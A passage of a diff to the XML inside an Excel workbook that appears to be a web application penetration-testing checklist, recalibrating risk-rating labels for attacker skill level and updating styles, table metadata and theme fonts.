     <t>Skills required</t>
   </si>
   <si>
-    <t>Advanced computer user [4]</t>
-  </si>
-  <si>
     <t>Loss of confidentiality</t>
   </si>
   <si>
@@ -455,9 +459,6 @@
     <t>Full access or expensive resources required [0]</t>
   </si>
   <si>
-    <t>Security penetration skills [1]</t>
-  </si>
-  <si>
     <t>Special access or resources required [4]</t>
   </si>
   <si>
@@ -467,9 +468,6 @@
     <t>Theoretical [1]</t>
   </si>
   <si>
-    <t>Network and programmaing skills [3]</t>
-  </si>
-  <si>
     <t>Possible reward [4]</t>
   </si>
   <si>
@@ -503,22 +501,13 @@
     <t>Logged without review [8]</t>
   </si>
   <si>
-    <t>Some technical skills [6]</t>
-  </si>
-  <si>
     <t>Authenticated users [6]</t>
   </si>
   <si>
     <t>Automated tools available [9]</t>
   </si>
   <si>
-    <t>Public knowledge [7]</t>
-  </si>
-  <si>
     <t>Not logged [9]</t>
-  </si>
-  <si>
-    <t>no technical skills [9]</t>
   </si>
   <si>
     <t>Anonymous Internet users [9]</t>
@@ -650,9 +639,6 @@
   </si>
   <si>
     <t>Moderate</t>
-  </si>
-  <si>
-    <t>By Prathan Phongthiproek</t>
   </si>
   <si>
     <t>Not Started</t>
@@ -1744,12 +1730,30 @@
   <si>
     <t>Burp Proxy, ZAP, Liffy, Panoptic</t>
   </si>
+  <si>
+    <t>No technical skills [1]</t>
+  </si>
+  <si>
+    <t>Some technical skills [3]</t>
+  </si>
+  <si>
+    <t>Advanced computer user [5]</t>
+  </si>
+  <si>
+    <t>Network and programming skills [6]</t>
+  </si>
+  <si>
+    <t>Security penetration skills [9]</t>
+  </si>
+  <si>
+    <t>Public knowledge [9]</t>
+  </si>
 </sst>
 </file>
 
 <file path=xl/styles.xml><?xml version="1.0" encoding="utf-8"?>
-<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" mc:Ignorable="x14ac">
-  <fonts count="26" x14ac:knownFonts="1">
+<styleSheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:x16r2="http://schemas.microsoft.com/office/spreadsheetml/2015/02/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" mc:Ignorable="x14ac x16r2 xr">
+  <fonts count="27" x14ac:knownFonts="1">
     <font>
       <sz val="10"/>
       <name val="Arial"/>
@@ -1925,6 +1929,13 @@
       <sz val="9"/>
       <color indexed="23"/>
       <name val="Arial"/>
+      <family val="2"/>
+    </font>
+    <font>
+      <b/>
+      <sz val="9"/>
+      <color rgb="FF000000"/>
+      <name val="Tahoma"/>
       <family val="2"/>
     </font>
   </fonts>
@@ -2164,6 +2175,18 @@
     <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
+    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment horizontal="right"/>
+    </xf>
+    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
+    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment horizontal="left"/>
+    </xf>
+    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="center" wrapText="1"/>
+    </xf>
     <xf numFmtId="0" fontId="2" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
       <alignment horizontal="left" vertical="center" wrapText="1"/>
     </xf>
@@ -2189,18 +2212,6 @@
     <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
       <alignment vertical="center" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="7" fillId="0" borderId="0" xfId="0" applyNumberFormat="1" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left" vertical="center" wrapText="1"/>
-    </xf>
-    <xf numFmtId="0" fontId="10" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="right"/>
-    </xf>
-    <xf numFmtId="0" fontId="11" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left"/>
-    </xf>
-    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
-      <alignment horizontal="left"/>
-    </xf>
   </cellXfs>
   <cellStyles count="1">
     <cellStyle name="Normal" xfId="0" builtinId="0"/>
@@ -3629,165 +3640,165 @@
 </file>
 
 <file path=xl/tables/table1.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="1" name="Table1" displayName="Table1" ref="A4:F14" totalsRowShown="0" headerRowDxfId="81">
-  <autoFilter ref="A4:F14"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="1" xr:uid="{00000000-000C-0000-FFFF-FFFF00000000}" name="Table1" displayName="Table1" ref="A4:F14" totalsRowShown="0" headerRowDxfId="81">
+  <autoFilter ref="A4:F14" xr:uid="{00000000-0009-0000-0100-000001000000}"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Information Gathering" dataDxfId="80"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="79"/>
-    <tableColumn id="3" name="Description" dataDxfId="78"/>
-    <tableColumn id="4" name="Tools" dataDxfId="77"/>
-    <tableColumn id="5" name="Result" dataDxfId="76"/>
-    <tableColumn id="6" name="Remark"/>
+    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0000-000001000000}" name="Information Gathering" dataDxfId="80"/>
+    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0000-000002000000}" name="Test Name" dataDxfId="79"/>
+    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0000-000003000000}" name="Description" dataDxfId="78"/>
+    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0000-000004000000}" name="Tools" dataDxfId="77"/>
+    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0000-000005000000}" name="Result" dataDxfId="76"/>
+    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0000-000006000000}" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
 </file>
 
 <file path=xl/tables/table10.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="14" name="Table61415" displayName="Table61415" ref="A96:F99" totalsRowShown="0" headerRowDxfId="27">
-  <autoFilter ref="A96:F99"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="14" xr:uid="{00000000-000C-0000-FFFF-FFFF09000000}" name="Table61415" displayName="Table61415" ref="A96:F99" totalsRowShown="0" headerRowDxfId="27">
+  <autoFilter ref="A96:F99" xr:uid="{00000000-0009-0000-0100-00000E000000}"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Cryptography" dataDxfId="26"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="25"/>
-    <tableColumn id="3" name="Description" dataDxfId="24"/>
-    <tableColumn id="4" name="Tools" dataDxfId="23"/>
-    <tableColumn id="5" name="Result" dataDxfId="22"/>
-    <tableColumn id="6" name="Remark"/>
+    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0900-000001000000}" name="Cryptography" dataDxfId="26"/>
+    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0900-000002000000}" name="Test Name" dataDxfId="25"/>
+    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0900-000003000000}" name="Description" dataDxfId="24"/>
+    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0900-000004000000}" name="Tools" dataDxfId="23"/>
+    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0900-000005000000}" name="Result" dataDxfId="22"/>
+    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0900-000006000000}" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
 </file>
 
 <file path=xl/tables/table11.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="15" name="Table616" displayName="Table616" ref="A112:F124" totalsRowShown="0" headerRowDxfId="21">
-  <autoFilter ref="A112:F124"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="15" xr:uid="{00000000-000C-0000-FFFF-FFFF0A000000}" name="Table616" displayName="Table616" ref="A112:F124" totalsRowShown="0" headerRowDxfId="21">
+  <autoFilter ref="A112:F124" xr:uid="{00000000-0009-0000-0100-00000F000000}"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Client Side Testing" dataDxfId="20"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="19"/>
-    <tableColumn id="3" name="Description" dataDxfId="18"/>
-    <tableColumn id="4" name="Tools" dataDxfId="17"/>
-    <tableColumn id="5" name="Result" dataDxfId="16"/>
-    <tableColumn id="6" name="Remark"/>
+    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0A00-000001000000}" name="Client Side Testing" dataDxfId="20"/>
+    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0A00-000002000000}" name="Test Name" dataDxfId="19"/>
+    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0A00-000003000000}" name="Description" dataDxfId="18"/>
+    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0A00-000004000000}" name="Tools" dataDxfId="17"/>
+    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0A00-000005000000}" name="Result" dataDxfId="16"/>
+    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0A00-000006000000}" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
 </file>
 
 <file path=xl/tables/table2.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="2" name="Table2" displayName="Table2" ref="A16:F24" totalsRowShown="0" headerRowDxfId="75">
-  <autoFilter ref="A16:F24"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="2" xr:uid="{00000000-000C-0000-FFFF-FFFF01000000}" name="Table2" displayName="Table2" ref="A16:F24" totalsRowShown="0" headerRowDxfId="75">
+  <autoFilter ref="A16:F24" xr:uid="{00000000-0009-0000-0100-000002000000}"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Configuration and Deploy Management Testing" dataDxfId="74"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="73"/>
-    <tableColumn id="3" name="Description" dataDxfId="72"/>
-    <tableColumn id="4" name="Tools" dataDxfId="71"/>
-    <tableColumn id="5" name="Result" dataDxfId="70"/>
-    <tableColumn id="6" name="Remark"/>
+    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0100-000001000000}" name="Configuration and Deploy Management Testing" dataDxfId="74"/>
+    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0100-000002000000}" name="Test Name" dataDxfId="73"/>
+    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0100-000003000000}" name="Description" dataDxfId="72"/>
+    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0100-000004000000}" name="Tools" dataDxfId="71"/>
+    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0100-000005000000}" name="Result" dataDxfId="70"/>
+    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0100-000006000000}" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
 </file>
 
 <file path=xl/tables/table3.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="3" name="Table3" displayName="Table3" ref="A35:F45" totalsRowShown="0" headerRowDxfId="69">
-  <autoFilter ref="A35:F45"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="3" xr:uid="{00000000-000C-0000-FFFF-FFFF02000000}" name="Table3" displayName="Table3" ref="A35:F45" totalsRowShown="0" headerRowDxfId="69">
+  <autoFilter ref="A35:F45" xr:uid="{00000000-0009-0000-0100-000003000000}"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Authentication Testing" dataDxfId="68"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="67"/>
-    <tableColumn id="3" name="Description" dataDxfId="66"/>
-    <tableColumn id="4" name="Tools" dataDxfId="65"/>
-    <tableColumn id="5" name="Result" dataDxfId="64"/>
-    <tableColumn id="6" name="Remark"/>
+    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0200-000001000000}" name="Authentication Testing" dataDxfId="68"/>
+    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0200-000002000000}" name="Test Name" dataDxfId="67"/>
+    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0200-000003000000}" name="Description" dataDxfId="66"/>
+    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0200-000004000000}" name="Tools" dataDxfId="65"/>
+    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0200-000005000000}" name="Result" dataDxfId="64"/>
+    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0200-000006000000}" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
 </file>
 
 <file path=xl/tables/table4.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="4" name="Table4" displayName="Table4" ref="A53:F61" totalsRowShown="0" headerRowDxfId="63">
-  <autoFilter ref="A53:F61"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="4" xr:uid="{00000000-000C-0000-FFFF-FFFF03000000}" name="Table4" displayName="Table4" ref="A53:F61" totalsRowShown="0" headerRowDxfId="63">
+  <autoFilter ref="A53:F61" xr:uid="{00000000-0009-0000-0100-000004000000}"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Session Management Testing" dataDxfId="62"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="61"/>
-    <tableColumn id="3" name="Description" dataDxfId="60"/>
-    <tableColumn id="4" name="Tools" dataDxfId="59"/>
-    <tableColumn id="5" name="Result" dataDxfId="58"/>
-    <tableColumn id="6" name="Remark"/>
+    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0300-000001000000}" name="Session Management Testing" dataDxfId="62"/>
+    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0300-000002000000}" name="Test Name" dataDxfId="61"/>
+    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0300-000003000000}" name="Description" dataDxfId="60"/>
+    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0300-000004000000}" name="Tools" dataDxfId="59"/>
+    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0300-000005000000}" name="Result" dataDxfId="58"/>
+    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0300-000006000000}" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
 </file>
 
 <file path=xl/tables/table5.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="5" name="Table5" displayName="Table5" ref="A47:F51" totalsRowShown="0" headerRowDxfId="57">
-  <autoFilter ref="A47:F51"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="5" xr:uid="{00000000-000C-0000-FFFF-FFFF04000000}" name="Table5" displayName="Table5" ref="A47:F51" totalsRowShown="0" headerRowDxfId="57">
+  <autoFilter ref="A47:F51" xr:uid="{00000000-0009-0000-0100-000005000000}"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Authorization Testing " dataDxfId="56"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="55"/>
-    <tableColumn id="3" name="Description" dataDxfId="54"/>
-    <tableColumn id="4" name="Tools" dataDxfId="53"/>
-    <tableColumn id="5" name="Result" dataDxfId="52"/>
-    <tableColumn id="6" name="Remark"/>
+    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0400-000001000000}" name="Authorization Testing " dataDxfId="56"/>
+    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0400-000002000000}" name="Test Name" dataDxfId="55"/>
+    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0400-000003000000}" name="Description" dataDxfId="54"/>
+    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0400-000004000000}" name="Tools" dataDxfId="53"/>
+    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0400-000005000000}" name="Result" dataDxfId="52"/>
+    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0400-000006000000}" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
 </file>
 
 <file path=xl/tables/table6.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="6" name="Table6" displayName="Table6" ref="A101:F110" totalsRowShown="0" headerRowDxfId="51">
-  <autoFilter ref="A101:F110"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="6" xr:uid="{00000000-000C-0000-FFFF-FFFF05000000}" name="Table6" displayName="Table6" ref="A101:F110" totalsRowShown="0" headerRowDxfId="51">
+  <autoFilter ref="A101:F110" xr:uid="{00000000-0009-0000-0100-000006000000}"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Business logic Testing" dataDxfId="50"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="49"/>
-    <tableColumn id="3" name="Description" dataDxfId="48"/>
-    <tableColumn id="4" name="Tools" dataDxfId="47"/>
-    <tableColumn id="5" name="Result" dataDxfId="46"/>
-    <tableColumn id="6" name="Remark"/>
+    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0500-000001000000}" name="Business logic Testing" dataDxfId="50"/>
+    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0500-000002000000}" name="Test Name" dataDxfId="49"/>
+    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0500-000003000000}" name="Description" dataDxfId="48"/>
+    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0500-000004000000}" name="Tools" dataDxfId="47"/>
+    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0500-000005000000}" name="Result" dataDxfId="46"/>
+    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0500-000006000000}" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
 </file>
 
 <file path=xl/tables/table7.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="9" name="Table9" displayName="Table9" ref="A63:F90" totalsRowShown="0" headerRowDxfId="45">
-  <autoFilter ref="A63:F90"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="9" xr:uid="{00000000-000C-0000-FFFF-FFFF06000000}" name="Table9" displayName="Table9" ref="A63:F90" totalsRowShown="0" headerRowDxfId="45">
+  <autoFilter ref="A63:F90" xr:uid="{00000000-0009-0000-0100-000009000000}"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Data Validation Testing" dataDxfId="44"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="43"/>
-    <tableColumn id="3" name="Description" dataDxfId="42"/>
-    <tableColumn id="4" name="Tools" dataDxfId="41"/>
-    <tableColumn id="5" name="Result" dataDxfId="40"/>
-    <tableColumn id="6" name="Remark"/>
+    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0600-000001000000}" name="Data Validation Testing" dataDxfId="44"/>
+    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0600-000002000000}" name="Test Name" dataDxfId="43"/>
+    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0600-000003000000}" name="Description" dataDxfId="42"/>
+    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0600-000004000000}" name="Tools" dataDxfId="41"/>
+    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0600-000005000000}" name="Result" dataDxfId="40"/>
+    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0600-000006000000}" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
 </file>
 
 <file path=xl/tables/table8.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="8" name="Table29" displayName="Table29" ref="A26:F33" totalsRowShown="0" headerRowDxfId="39">
-  <autoFilter ref="A26:F33"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="8" xr:uid="{00000000-000C-0000-FFFF-FFFF07000000}" name="Table29" displayName="Table29" ref="A26:F33" totalsRowShown="0" headerRowDxfId="39">
+  <autoFilter ref="A26:F33" xr:uid="{00000000-0009-0000-0100-000008000000}"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Identity Management Testing" dataDxfId="38"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="37"/>
-    <tableColumn id="3" name="Description" dataDxfId="36"/>
-    <tableColumn id="4" name="Tools" dataDxfId="35"/>
-    <tableColumn id="5" name="Result" dataDxfId="34"/>
-    <tableColumn id="6" name="Remark"/>
+    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0700-000001000000}" name="Identity Management Testing" dataDxfId="38"/>
+    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0700-000002000000}" name="Test Name" dataDxfId="37"/>
+    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0700-000003000000}" name="Description" dataDxfId="36"/>
+    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0700-000004000000}" name="Tools" dataDxfId="35"/>
+    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0700-000005000000}" name="Result" dataDxfId="34"/>
+    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0700-000006000000}" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
 </file>
 
 <file path=xl/tables/table9.xml><?xml version="1.0" encoding="utf-8"?>
-<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" id="13" name="Table614" displayName="Table614" ref="A92:F94" totalsRowShown="0" headerRowDxfId="33">
-  <autoFilter ref="A92:F94"/>
+<table xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" mc:Ignorable="xr xr3" id="13" xr:uid="{00000000-000C-0000-FFFF-FFFF08000000}" name="Table614" displayName="Table614" ref="A92:F94" totalsRowShown="0" headerRowDxfId="33">
+  <autoFilter ref="A92:F94" xr:uid="{00000000-0009-0000-0100-00000D000000}"/>
   <tableColumns count="6">
-    <tableColumn id="1" name="Error Handling" dataDxfId="32"/>
-    <tableColumn id="2" name="Test Name" dataDxfId="31"/>
-    <tableColumn id="3" name="Description" dataDxfId="30"/>
-    <tableColumn id="4" name="Tools" dataDxfId="29"/>
-    <tableColumn id="5" name="Result" dataDxfId="28"/>
-    <tableColumn id="6" name="Remark"/>
+    <tableColumn id="1" xr3:uid="{00000000-0010-0000-0800-000001000000}" name="Error Handling" dataDxfId="32"/>
+    <tableColumn id="2" xr3:uid="{00000000-0010-0000-0800-000002000000}" name="Test Name" dataDxfId="31"/>
+    <tableColumn id="3" xr3:uid="{00000000-0010-0000-0800-000003000000}" name="Description" dataDxfId="30"/>
+    <tableColumn id="4" xr3:uid="{00000000-0010-0000-0800-000004000000}" name="Tools" dataDxfId="29"/>
+    <tableColumn id="5" xr3:uid="{00000000-0010-0000-0800-000005000000}" name="Result" dataDxfId="28"/>
+    <tableColumn id="6" xr3:uid="{00000000-0010-0000-0800-000006000000}" name="Remark"/>
   </tableColumns>
   <tableStyleInfo name="TableStyleLight16" showFirstColumn="0" showLastColumn="0" showRowStripes="1" showColumnStripes="0"/>
 </table>
@@ -3869,6 +3880,23 @@
         <a:font script="Viet" typeface="Times New Roman"/>
         <a:font script="Uigh" typeface="Microsoft Uighur"/>
         <a:font script="Geor" typeface="Sylfaen"/>
+        <a:font script="Armn" typeface="Arial"/>
+        <a:font script="Bugi" typeface="Leelawadee UI"/>
+        <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+        <a:font script="Java" typeface="Javanese Text"/>
+        <a:font script="Lisu" typeface="Segoe UI"/>
+        <a:font script="Mymr" typeface="Myanmar Text"/>
+        <a:font script="Nkoo" typeface="Ebrima"/>
+        <a:font script="Olck" typeface="Nirmala UI"/>
+        <a:font script="Osma" typeface="Ebrima"/>
+        <a:font script="Phag" typeface="Phagspa"/>
+        <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+        <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+        <a:font script="Syre" typeface="Estrangelo Edessa"/>
+        <a:font script="Sora" typeface="Nirmala UI"/>
+        <a:font script="Tale" typeface="Microsoft Tai Le"/>
+        <a:font script="Talu" typeface="Microsoft New Tai Lue"/>
+        <a:font script="Tfng" typeface="Ebrima"/>
       </a:majorFont>
       <a:minorFont>
         <a:latin typeface="Calibri" panose="020F0502020204030204"/>
@@ -3904,6 +3932,23 @@
         <a:font script="Viet" typeface="Arial"/>
         <a:font script="Uigh" typeface="Microsoft Uighur"/>
         <a:font script="Geor" typeface="Sylfaen"/>
+        <a:font script="Armn" typeface="Arial"/>
+        <a:font script="Bugi" typeface="Leelawadee UI"/>
+        <a:font script="Bopo" typeface="Microsoft JhengHei"/>
+        <a:font script="Java" typeface="Javanese Text"/>
+        <a:font script="Lisu" typeface="Segoe UI"/>
+        <a:font script="Mymr" typeface="Myanmar Text"/>
+        <a:font script="Nkoo" typeface="Ebrima"/>
+        <a:font script="Olck" typeface="Nirmala UI"/>
+        <a:font script="Osma" typeface="Ebrima"/>
+        <a:font script="Phag" typeface="Phagspa"/>
+        <a:font script="Syrn" typeface="Estrangelo Edessa"/>
+        <a:font script="Syrj" typeface="Estrangelo Edessa"/>
+        <a:font script="Syre" typeface="Estrangelo Edessa"/>
